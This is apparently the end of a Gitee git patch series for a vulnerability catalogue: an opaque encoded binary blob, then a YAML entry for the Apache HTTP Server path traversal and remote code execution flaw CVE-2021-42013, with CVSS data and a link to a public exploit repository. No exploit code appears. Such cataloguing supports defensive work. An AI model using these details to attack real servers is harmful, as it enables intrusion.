z6Y}+N{_f;*WQ7#|*&`b^CY{6u+05(*6FIOuGg=3s-F)UL3PxE}Ui7&-vQ)2mY0ed2 zm+5L;2RM*I%dcgF)>(oyW_O15Zk4M+JZ2ndfEN5Kn(C(%Q;H3=&0bSgnAzu;58qH@ zMM_?{9p|l}9&BOU#6=FZBe@T^(%Zx3ixXYXzD0{D6QuypII-`E0_S@T!OozT%vLE1 zDnwMc5`VCI*yyXJVwm{&(5-XlArXMu%W|06vyVV6)0N>O?R|B=q+G%7fE-l9*{Ljka^q_EB2H$15*IkVqm!pV)jm8lQijSu+Hl z6c}Hci{g1)xW%#Jw=Pd`gqG>l_Aia}t)+K{xdO%3`LBK5b~pL8%W*%vJLIW*<)`!> z_Du}JM^{pPn>sSjuO#bOZRh}fQu^Q#id>vg3hEteTbq-{lX#t7SuSJ_BLW}Ry`Lx_ z-^^=ZE;AFvU3@99w2y~^ohAr*3wRMwF&rc2I19%Se<)*p>@!^#4bJ&HLEiRIfMOX# zh0OgS?Q!lqKRQ2|Bm(LOtGFM1l|M`$eHozYTsIMI0}T8^-NwisO~MedksK07(laX^ z7mu3c`E}aq1MNxXd1*9hjEkvP|Jw=}H|2ajdzcW#vi9LPg`$sqECTr-T1>F`!p#cyQg>SNLRg%;{%gE_<=R zDG_a%gyoJK1-3oqu{QnZGPM}fRB^EO$C$Ae9XlpvSBfT;w{cf>`G-c~R;wcQSdZ~L zqeU?v0J59V;27G+ic>GY^WXDS(JyT%E2|slzrjE95vI!dj&!}oSZr?oS&^4`) z=zq#|NHbKt8HQbyBidf#4$;nK98q`Wchs$dVaearNz^Kz&zCH^Ka@1+kg(EYZ^Ikw zNomMuetpsXwU4WH;HMMg5+E>u{e0Qki?Hv^;&qwxb~R|5_zKcmp_}R1rO0^K&O+y- z$3K5R^XBR0vk?Bjmyj0u{e806{znwR$EoLxfR-SqUl|sLQ{>?NEid7V5EjzP@fFAW zN%AezgRS!g_4m!8CISL^y{wQ#feF&7nb0S6EO?faNK^VVYPrEZG;7?@nt%B4r84>O zafX28HJ%c%!`mBabieQ%29b~ zqY0EvLcyo2O3bb-=J@%p$3o@P*bCB%qO1xMg;U{0?k4=Uc2-BXn6t2_j&WzDJqK30 zhB}YN>t&yont^=JbnnL^iMG1NITIHHB~qob*OP|fMJG^dRLl*VrR56#W9dAG*t^`! z7D7>M`g{ln5c$1NN!JJ@bCIv&E|OPoX@>qi#5KshD7eeG!Bv8jvaXrs={({M+nCjA5P3&^&N9F&mi=1=zZPwZVes z#(6uhOZzvpd}tc6=6xdU+YR&&DLUVV_-p!i<(I^}{_^3-s<##9?uF4M6`Oc(bGib1 z5ONI6X^g~x-c%rtrZAG*{URGGIUbsA7vq1>U()Lw?n6XYTT?gI8@H|apKQy zs#yhQRa5M*}L9qO4wwAv?niH z3MdDD?tZE>)hntRS2gt3MOCK7siUJxVVct&mdxg=-M>PYd12yig-$ZJrZji0QYV z6!P2HOVWPLC{}luyMlsE@5yPtrs3SEFo+Hjk^r(jMDabS@)DY#xq3H*TE@{52g~ae zzHDuGCwzJ}>l;jrsvy>EDvgdbLl+Wc_^QI>GJg&s7akn}hMM`QMXq9Kl z2V`T(3@_<*`9g0sF>9)=H$XbS_#q6?dx)lhG?>hQ*z%_+*jGP;Iyu+7& z8GGwbRc+uEv=)IJQ>wjNbn+XS&L$%ZCg17#JMIrvyR=kWQq+}f{cXQh?zpnxNTG18 z1NPiTfI};PvwsL_@mf%Zr)4kDg12OgwC;)VRjsinA2Z0)bFJ9HYVB5VZATtn+~_=l zVO*6YKp;BV@-W-@Dh2|*ORrR0bL1}B$ju-*>U>$t4fsOZaOSCeS*J+8`($F7b_Woe z9R6#Vy(@L~^#k1g;<@aS7;ZlKvNgK zNyNLMSc&2#t@0O_ItG)M_#Tu5;DQ-3{TNwJjUgMEalNq2xdtdZ z3jw}+f#~hgVYU-f<#y`RUcp+R27sR0sQq?M*(D%&il9H$@K3OEq8!-*0L>8WE=$D9 zuNM(}&w~1T_+jjI^CUVwB@ekzAk~5a_dN575twe*t2G$x`H_n3o^WPG zef!v%&*hv+ooyXruYWEK&k1Ha#mGYpGfIs=Bw5~P{M%)P9Xkbxzr5R)Y0Yw3V~JCe z(AzWhtzj@L?Fi_7MpAph$5nngg-HL~W*~^Tt5zj=^~OJXtbmySc-TaiA~Jd~iyq4Y zVq)SSguTaNA07Al8p%XS(E!nWaI;!`D8*GrtLz<$^;U(x5$e#%k~wZc>t_ceh7p=C zA84Nr44sE26EnVNV`P7izt`fS8sxQ>dG-5d_H8e%OJ9h4!O*+d=#}*w5aHn&UMMk% zUEP`(m3#T+J+y{G@5;$~%HxafPBnp-rc!Otmy{!Wri!8pw4gnEcW5W{3>>jRmR|wz zQ4q~K8y9}mBM0|ii(#6<;or3c5nVFoYkjMgS|nV?&jL@GF5{QG71-V!pKFvCf8AmY z3s~baGBxpEjdVFR-(2rf`r|FR^No&u!Tq{meWjg9i@gqu2Ix!-Pz;=f@uR^3;oe4HV;;_uYH(#w2TfX)c+o?-8mpMW6{sKxJ zte*yGtZ*zYO;E z>1UJTj^|Br$2-ja9rJ8X9b`jjEaFV-32dy|#=y+ouw+2sxA8{YY0yjoJ*lyd9Zbij z|MC9GxxbpH3RGfZf;LfCLf6KWvV(yM{3jyG{`}cm#vb+$>|k^{n9ur;h%{MmaFvL1 zaIL~HAQiXmrDALl{t?>WyuH2#wL|=h z*&iCk@4d%{J@P&BnN$J5tkBhlx~ZL!ZPPT{X3nbbj1R-i!ZE^d#ccsKKs0CW>$c!k zi*^_9#dbNRF}rqS#ew$bgO64?{RX9?L5s;gKNoA75&wenCwqITTPdPnw=6^J4z^sS zF)AP@9R6~HT6S;Ub%x$})ZPNUOZ)Kqikf6TB;p|7h&dV7GUG39j!3JNY`Ww%+|_J+ z1`&lJu{#Pvv2RDOJEX{8Ul@;-cyT!y?0^&(8|Nr7BdN7qxyzO$y(5ww=cabb=R(Qw zalxU4Q(vxue;ZBtK?GlM9yWs5*>XC(SP;q&6ShVkHVpO+>t_L;tt3Vd(>M5$Y6-mvD39C2UC1FlV)|(lKe$x)9?voJG+%IqJM?kw>s>uY`E$qnkU}} zyZ8*sMu|~!x1LPh=f@pCajHci%=8=bUVB%D{^swBUZ8VW_ofi6H(onG58jwY8ma0j zQ$I$;SY}q+|E7w9RIPw(YFd`d+n%rv^3^_;^y`M09@*b;+eX(o{pk5tfu-r5O<=+p z&5Q-5$i5;a6|!F726#35Pesg&W@KllssGgYLz+98o~N?#(tVix!GJ~8gW)gm1BL9D zZT7!)d-pJ_6PpU*fyhxhi1+F!jHt29)=CE$4geY_wd~gT-^1TldR4-{1$_Q~9T+|F z{-A<3yIz&HPd3U5k#})1CSaWg*I?2aT4`xAt2tU zR3FkUR1?%%FrVx{C$M0{|3-$KH)f%+(q z9^z@1WOOO7S1as^RH zU*Zl>gW%04Kiq#$+NK**Wuq6ra@qP5^Ku_wqn^hasMGs{weH_!906h}x z+1|2<&~s`e9Fggd zZ$xa;hx>DuOP0j#wUS=rAl{-@kJc4@{NyI3rrFX{{H#jXk!etqfpU=2*cb@@xuM%z z$B;y5cB~+PL`-2NXejcPTp7%4{kFaJw0ShUMFFF8R}x!?BvkY`3nJ-^e*$*zq%Py` z5dw^D|9lsY_zZ8h6@wkWhNiDkv-fQfu1!|6Vehbd)n&hsqQm4o4Iinw(nI{t%Zh~d z9N@-A7IAe3orLWHh8$8HEPE_s(_Rq8-!!4*`hfX*2(TX-Idq}?={sl}ps4f;F{=-K zX&GN>_quh5<{WzvRu@;VcI}L)fds2B%;z(x3x+?&PqXp9xb{RBUaxEjPUji97RtfR z<8l>ZMG)QC8dO@zjUZ-<2`UPov6y{`JwCl+sEiOl*XQt>d>B_N_tiSGAvZ@h3W0c_ zAQy6qahCE5Yprg{!FCEAAFU@Q12jyy%{ha|e2=MyER=ogCaIm?E%gh)Aiew<^ik{u zVKrfI;}R?F@)y82I&oZpEs6N@_+@jca$~anX~CX``o|Iuf*Q91Lg3T{ro?!cUaer+ z(MXN!ljD~Ma*_e0pG%DynvI%y8T$GGt|}dNP#H%k)s4H&pqH0-(#73w!4RN_$j82G z354@N%X8?kcN@`*<9R5s(V1b*q0i7;Fx`Ddr<>t6tkX*Qkr+f2ghA1uMBP){S$^jR4&Ol)fHMuWXLt5t#2+@XGVFqKL(cy0vklLs>pn3G--g4`0ZwaB z@Q|QNoVL#H9j_Z?N=ATdz23C2X7-xfR>t8SA+J5%9{Z|6|JHOMk`6gYvOc4n`;j)N zGmy52{=RZa&zAR?hewu0hTRF9BTXr8|?wbd4=%lma3w&VFc9ZNO zA`HRj-0Dp%r`duNTqRReWwU& z5`>~2nv&x0?)!5|!8xumDYN6<;6;3;=2o!pSpBrv%6vNc4ja6dz#Y`QDNE=g3>`*x zhs`9sSQjDTxJ$dDx)-@lteCl0G4mwW>L8j5KS>#SlM`^F%~FS$skdscZtrxm9e31H z50QBF^uR2pe61-sO(7_*lJr8&owFrqCg3I$SbUk+9v!kqN34Eqf6=~H0^;0-STJcQ z8ab>2YYkB(^kkBLI(>|af42x3wzdA%tR6RRH=ZHqj+C|~s0|U3TyXqi%3FDE0cr>z zX*v~Uy+j@Sl;J6l{fONHET~MR(qdDE`(E5h^-x_Xsi^8}ed{W#a-Rn~FYtQ~RIpcu z{s%qhRFL`k#k6hXuvI~<&fp&w^qaPG>)gY!mWy)1vek~9lTk4KUT*^4=)Rk3)!G7t zxuY90tl8~fO(S^{1W^RTgApRfdap!VVW)?NQjs|I?@O?EL!h$6fhCeIkE@?j@+}kc zHSr2X$aB`=ay5AF z^Z$%mZVD5L=f2HWbx;4RsdM0Hgxlpbnjp?fSn`WB<)fA7IH$ESl)xAK(MvgRrTicc z+WFf5Lm1G0Yzf=!>=rX-)!w?VC@PraPEDP6+)1Z)^n-bC-^byJo6yB>|8zJR_H)Dvtw$MlWK@VDyqf02N?vv0Z$Afq5sT8;rp4lpUPI zo_}O$7<6z&%)N~4G~D_Zh*>pQnlvy^(&aQDl+bF-HfGINu#Y+@eRzh8Fy~N&%nQ9z zqUWuc_|*PU%=+%V{f&&~=pFj=KZgXO!&-8-7HqSmcCn9>G#<3N9-l$}x(@W0Ar}%N zzJk5%>2)T95>q4+G=Vvc0MfS5XwkG=iLtIUHbR#c6<^8HX0L~?ZQX%;gXh{u~XjNhx3;u$+kNs%G>nto0SlnL3( zhPp4F3mX@`LLOEQmZlB7r&OGnoJeBfvX6foQM>v=X_jgF@o~8zF4tQa5UOpj+fC;4 zR%(x?H7qUC8%N%vDujxw*}d^lp|L)RX-7{z_hHeoa#vJE)``xSYTzjz9&c=IjT7^~ z#!zdx$J`1X8@CV?KM5tUf1D0+azy>gDr5FnPBk3f{dtC2!CuwDVENiolt=<9%{5}| z0=0~PwcgU2GXz@eS*cG0EY)MCL}WE(l}|N+1+M!PjjxNr4YN5c0B_ecW9KG!r*V&Qo_v4lls;s4f(^oU!3&wiNIu9dXxOpdGlLw|rXl5}p z-f1)QotyD{7>~$|F4K&~nI7b;Cb7H}_Qe|et|7zlfqt)&p&Qn4x7ym|l`rQ!kcs)+ zp~-jOz&Ji2M!t32YD^lhaKon*?v7EllkgziG$tsbIB#dkS*vZfJ7yAATz_twwN z*r(-*I}yt2{6qj>I)l2joZ)6VXW4B)=|`NsLXz;{BO^`SmX^`H@-gys;2ZSC)i1^Mg80TrP4W#_lU@Yj3yEW+HhfB9y-+RrezE!|AmqV6Y~~ga@}|I-O{@9BW_=Y~t^IBv?Pnz?SNS&zS+J^3_`x}H38Ex3ukck#pT&b=x@?|k#z zi=)3crNY&Nt_rF_nnq=VWWBaq00q=`#?XAxQb)gsrnlDa1JhIUNBblm-nz!;3#^S= zkV>m2lH6YtfE6>b*EzLZ)53|mk2uES5B6g9mWnP^*XiCaDg9XR#Wj8`3TYTK#v$+u z2mEjOzYd61sFU5)RXtI75p(ZwOd_;*;9uf+bl)b0II%~F@vriBAc*3nWdPJ#I$ri|w(Co6qH9;|@~!AN**gCvc~$a*yN7gx z-0r#6m48qvrRVy-%l%?&_&JiKx34o7~i=?o_*9wkLG;Ek2BXI`*2np4q%U4^{;ak}^WLtqu9R#~8Y^@_j>H5M8<>e>F(o zcYWq;z8F1Q%G3R|cs>FxUuPk{tJg|?HZ3dW2vQ_L9K)2R5n(og8MHeKoBNQtheDL0?o=zlajPS07aaXcEudlgWz60S{MrdyYh67sO=Y02`3Ny#Cs1 zzwHKKJ{MR@$Ivl7g^1}gEh9$H%$T;GCe%$=^z9?YWQ2kdyCXYAEp#B)LLNZJ^Mcr8 z>&r6kQyhp4JLa-9!_8PAcQ<_ts()BeT{U(rb~0LaZrzi~Umw00b?=t!+qm6qgl~6? zYy{dWaJ44q<^I+CYDpx4-=J(TW`MZ5#rz$P_!9P(eUd1~)*!E%#n;}UMTbktKtPwv zw)Da~83ozMGPB+x#d{jPWT{Kn%n!Q|>NP@N1EB^rqjJp#MH0eq$8Iiu<$<_~)a-{* zJk4QzaZ-=GVWZ2s zmLqNCWA-d6@yobUwXx>s6aX=s^8}cE%TrVgLQHQPaB3tSGjABe|HMhUy2aj^A5D(v zIZ}^b12Gzr1!%o%DK<>`G?uzYt(0m%-QpE^98Cf zw)~}z#zvn%d>_J)W*V}MfKNY-7x-w6Ijm^`#{r}@;6K`$Q$J;)RioRy*U4O9Et>Gj zqaVfve=^Z;L)%2YRhHx4VC-0>4Y5Ti|MS4oz-j}wt zN*Xbfqd&B{bx@rfY^r_jaLK?b673tK+!=}K(hYo%Z4}U7i(aYs1N=b@O}XF8qAmG) zbwTT;~Syjv^#a@xu9;YTg z)Ba7eQ{b1i$%leFrZCp`&8AoVOk?n!j|6M4aY5g|(Fv9eyN$YGr&3PHC43?p+4Z;W zR&2p03+Y-@7jv-M@^J_J(rj_bT+`O>ewpJqSWqE-Jwr*D*Rt$8rY|^r@`iVI=+#8% zEBGTs03LiO4+95BJS27~Q{*sV004dk{B3E?u)cT%*jA=s9hu=KSgudGOmd|y%-1}8 zIZ5vsL!K<$F~1h|@>jaeGB`p8^>IvlDFAYRXJ0VE{RKy@^!~jlm;%op0$ z)yK&9o+Lq=T(9&Qi(-+|b9Gy#;Q>o?E3qdGz)Se~=Cl??nPLmO40yxLck5Z>>hvS^SM|a@+*K6 zsRXUHSl&LQ-w!^-$VcnU@r6Or*bUaI0X42Xb4IIH>KISV`@hFZynpE1w*Dp+Q2p7< z;3O0fv3jPSNaFHVffnc;`Q@r?15(8If&(cnejo5d3UKhV;xZ+K&`YVcE~3A-vhpSc z;ARjBNjI$P9~;erZymH#0fQ} zn+yOySO6+4|je)!RWR;B&xBfH1DBp%PIz@XE{shnE_lSWU`2fdj`9LN1 z4~NVjk8>U#kK4>~DjM$|zRWB(E5~%?sx%Mbbzgq$6fr~2n3WA?COc}A*qwWlWkE?R zODaxujm$dz6^djW+kquSP!5mW$$6SU`Ys#2EPMymM%ML(uv(R*4)WNpkAnZ!s32yW?4HaerKF-_-WNKP>>+ z{PRkQ*hNl!&DIytU?kjNOfSxU?M!WOq?FOFM=1e;O_>D{yG3?)>8J_Qq zGXl`(SE7d2hAZ$SR=y?Ey%z0Cl)3srK$MG0LBk^AZYgUw+fUC99WUO|ErW*NaS7PeM; z8e8RBAf;Xrn{9GXN|5qgXg=aP32G%6|3@Aw?NZaH(ZkgHfV|opGFF@PfZG}=WkDn+ z^VKr|ymcp8yj~J-O=&|C@w(c&aq+*7m6U5X9|2HRC!FF#9K*$n|0e1P9w)B5MRFmt z*Z{&g`U51Z-0a(z9g>K8W~eU_ppedYBNDJ={cpz-B)Q&^@nCcT(;~hzBh{C%pI4j2 z)^Wav!My^2@7e$_3cbbs4}eEeAiXK~9PCIou`}h;vCX}xvC^3fvL2)V=Ah)#BUe0; z0u*)+T2TWe-?jgnm=YO8u4n)VKjT8;eg4Cx(6&s(l>xX|-uA?h^pY>`fPRD#e`vWY z5LEzg2IbKL+6OI5G{5Pu9ra%kO}+R#y?J=I<0Rq*x@7|*Mig{gWZM{V4%2&5_^%f+ z8<6||#t3b?#IYMu@&J=tUbMPhYR25~MelNAKTk9_T7vZAVQ3n##-L+hiy^ z$s0M=UKHS0S*HO&M1P9t(JFYTPyA#Wh)4qTB$B0pNN^$l0bXh|rBpl#0?7F#bt+U> zbDJSqK*a5!ObB~PqG3X^PbS*7U3Y4PGR?up@`$mQPz3ZWc;?=vJ+%JMf>9#>zYHXxZqVFbI3 z84@26)LNFo>8e^R`sDSxf>TnJ`;sS zC;y!Mh#Ro$(~akUgiaA8ie!L{boR!|ZNN=HMdj|cAH0&0_=c9Fm!8nQvEuqq8~O$) z0Y1kR?1{8q5cU7NRRYs%8O7-~bnIKY)uL*t6chU6nYj`EOX+ z+b6`&)!8Kgpa-_|aJA=A@%FTJ_2O{}2=I{+5wZ7kv<+|#bhP*O^z`=f7xwmZ79mnO zdigv0i}?J<;qV`Wi1`5i2XRuqf0H`c1~|(6$La`pD*8n9vFMY>VxmS*MPpyNoZ>NADTR%rYP*9MttCzdKy{(VqKfVH_92=47&i{zO ze)f(4T^~m;9!-01FP@jKc7C>gA%ZsaZ~hMqL+^hyAY+4<{|AXTk=&I??eRZiVgLUq zoQQKf3VS&Qh=^HQ|0HtX{I`OUYk-F%z=zs|q7 literal 0 HcmV?d00001 diff --git a/cve/apache/2021/yaml/KVE-2022-0206.yaml b/cve/apache/2021/yaml/CVE-2021-41773.yaml similarity index 100% rename from cve/apache/2021/yaml/KVE-2022-0206.yaml rename to cve/apache/2021/yaml/CVE-2021-41773.yaml diff --git a/cve/apache/2021/yaml/CVE-2021-42013.yaml b/cve/apache/2021/yaml/CVE-2021-42013.yaml new file mode 100644 index 00000000..54397638 --- /dev/null +++ b/cve/apache/2021/yaml/CVE-2021-42013.yaml @@ -0,0 +1,20 @@ +id: CVE-2021-42013 +source: https://github.com/Ls4ss/CVE-2021-41773_CVE-2021-42013 +info: + name: Apache HTTP Server(简称 Apache)是开源的 Web 服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的 Web 服务器端软件之一。它快速、可靠并且可通过简单的 API 扩展,将 Perl/Python 等解释器编译到服务器中。 + severity: critical + description: | + Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。 + scope-of-influence: + Apache HTTP = 2.4.49, Apache HTTP = 2.4.50 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42013 + - https://httpd.apache.org/security/vulnerabilities_24.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-42013 + cwe-id: CWE-22 + cnvd-id: None + kve-id: None + tags: cve2021,Apache,目录遍历 \ No newline at end of file diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml index fda618d6..276c1b86 100644 --- a/vulnerability_list.yaml +++ b/vulnerability_list.yaml @@ -3,6 +3,7 @@ cve: apache: - CVE-2020-9490 - CVE-2021-41773 + - CVE-2021-42013 linux-kernel: - CVE-2021-22555 - CVE-2022-34918 -- Gitee From 8eb68e70cdf2c62233e8a40c47d0f26283d0bb66 Mon Sep 17 00:00:00 2001 From: yangjipeng Date: Mon, 24 Oct 2022 11:06:03 +0800 Subject: [PATCH 2/2] UPDATE CVE-2021-42013 --- cve/apache/2021/yaml/CVE-2021-42013.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/apache/2021/yaml/CVE-2021-42013.yaml b/cve/apache/2021/yaml/CVE-2021-42013.yaml index 54397638..25ad6322 100644 --- a/cve/apache/2021/yaml/CVE-2021-42013.yaml +++ b/cve/apache/2021/yaml/CVE-2021-42013.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-22 cnvd-id: None kve-id: None - tags: cve2021,Apache,目录遍历 \ No newline at end of file + tags: cve2021,Apache,目录遍历,RCE \ No newline at end of file -- Gitee